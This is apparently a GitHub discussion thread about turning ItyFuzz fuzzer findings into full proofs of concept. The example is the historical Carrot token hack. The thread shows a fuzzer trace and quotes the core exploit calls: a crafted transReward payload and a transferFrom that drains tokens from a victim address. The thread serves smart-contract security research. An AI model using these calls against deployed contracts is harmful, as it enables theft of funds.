Question: Going from ItyFuzz finding to complete PoC

[rappie]

I've been looking at some old hacks and how they are found by ItyFuzz. I've noticed that the findings are often in the right direction but don't describe the full exploit.

For example, the Carrot hack output i'm getting is.

Oracle: 💰[Flashloan] Earned 115792089237316195423570985008687907853269984665640564039457584007913129639935000000 more than owed 148133967134024642964942186048715434943000000, net earned = 115792089237316195423570985008687907853121850698506539396492641821864414204992000000wei (115792089237316195423570985008687907853121850698506539396492ETH)
Found a solution! trace: Begin
{"caller":"0x35c9dfd76bf02107ff4f7128bd69716612d31ddb","contract":"0xcff086ead392ccb39c49ecda8c974ad5238452ac","data":"Borrow with Some(120968139825468103452524544) ETH, liq percent: 0","value":"0x6410000000fdff00000000","flashloan":"earned: 0, owed: 120968139825468103452524544000000","layer":0,"additional_info":[0]}

{"caller":"0x35c9dfd76bf02107ff4f7128bd69716612d31ddb","contract":"0xcff086ead392ccb39c49ecda8c974ad5238452ac","data":"Borrow with Some(148122912659567912990383767717842783716) ETH, liq percent: 0","value":"0x6f6f6f6f6f0000fffffff00000000de4","flashloan":"earned: 0, owed: 148122912659688881130209235821295308260000000","layer":0,"additional_info":[0]}

{"caller":"0x35c9dfd76bf02107ff4f7128bd69716612d31ddb","contract":"0xcff086ead392ccb39c49ecda8c974ad5238452ac","data":"Borrow with Some(11054474335686276869224313096707547) ETH, liq percent: 0","value":"0x22107150471d7bd69716613d31ddb","flashloan":"earned: 0, owed: 148133967134024567407078460134392015807000000","layer":0,"additional_info":[90]}

{"caller":"0x35c9dfd76bf02107ff4f7128bd69716612d31ddb","contract":"0xcff086ead392ccb39c49ecda8c974ad5238452ac","data":"Borrow with Some(75557863725914323419136) ETH, liq percent: 0","value":"0x10000000000000000000","flashloan":"earned: 0, owed: 148133967134024642964942186048715434943000000","layer":0,"additional_info":[51]}

{"caller":"0x35c9dfd76bf02107ff4f7128bd69716612d31ddb","contract":"0xcff086ead392ccb39c49ecda8c974ad5238452ac","data":"transReward(0x0f0110e1000404010a80001015010036045d0160) with None ETH (bb7bf89f000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000140f0110e1000404010a80001015010036045d0160000000000000000000000000), liq percent: 0","value":null,"flashloan":"earned: 115792089237316195423570985008687907853269984665640564039457584007913129639935000000, owed: 148133967134024642964942186048715434943000000","layer":0,"additional_info":[255]}

The transReward function is one of the main parts of the hack. But there are more actions (and thought processes) necessary to find the real exploit:

• The right payload to pass to transReward
• The transferFrom call to extract the tokens

This is from:
https://github.com/SunWeb3Sec/DeFiHackLabs/blob/2e02134be123f8bbaa3bbe5a40a9b5b0726dd637/src/test/Carrot_exp.sol

Carrot.transReward( hex"bf699b4b000000000000000000000000b4c79daB8f259C7Aee6E5b2Aa729821864227e84" );

Carrot.transferFrom(
	0x00B433800970286CF08F34C96cf07f35412F1161,
	address(this),
	310344736073087429864760
);

What is your workflow / are your suggestions on how to go from a raw finding to an actual PoC? Am I missing certain options available to get a more detailed trace? Any help would be greatly appreciated 🙂

[shouc]

We are working on minimizer for exploits, which can reduce the appearance of useless transactions. In the mean time, you can also use tenderly to fine-tune the exploit.

[rappie]

Thanks. Shrinking would be great 🙂

I have been using Tenderly, but often times it's not clear if there is a real exploit possible. It takes a lot of manual investigation.

Another question about the Carrot exploit:
Does ItyFuzz actually find a way to make profit here? Or does it only detect the arbitrary external call vulnerability?

[shouc]

No, it just finds the external call. We are working on separating the detector of arbitrary external call with flashloan so it can be disabled.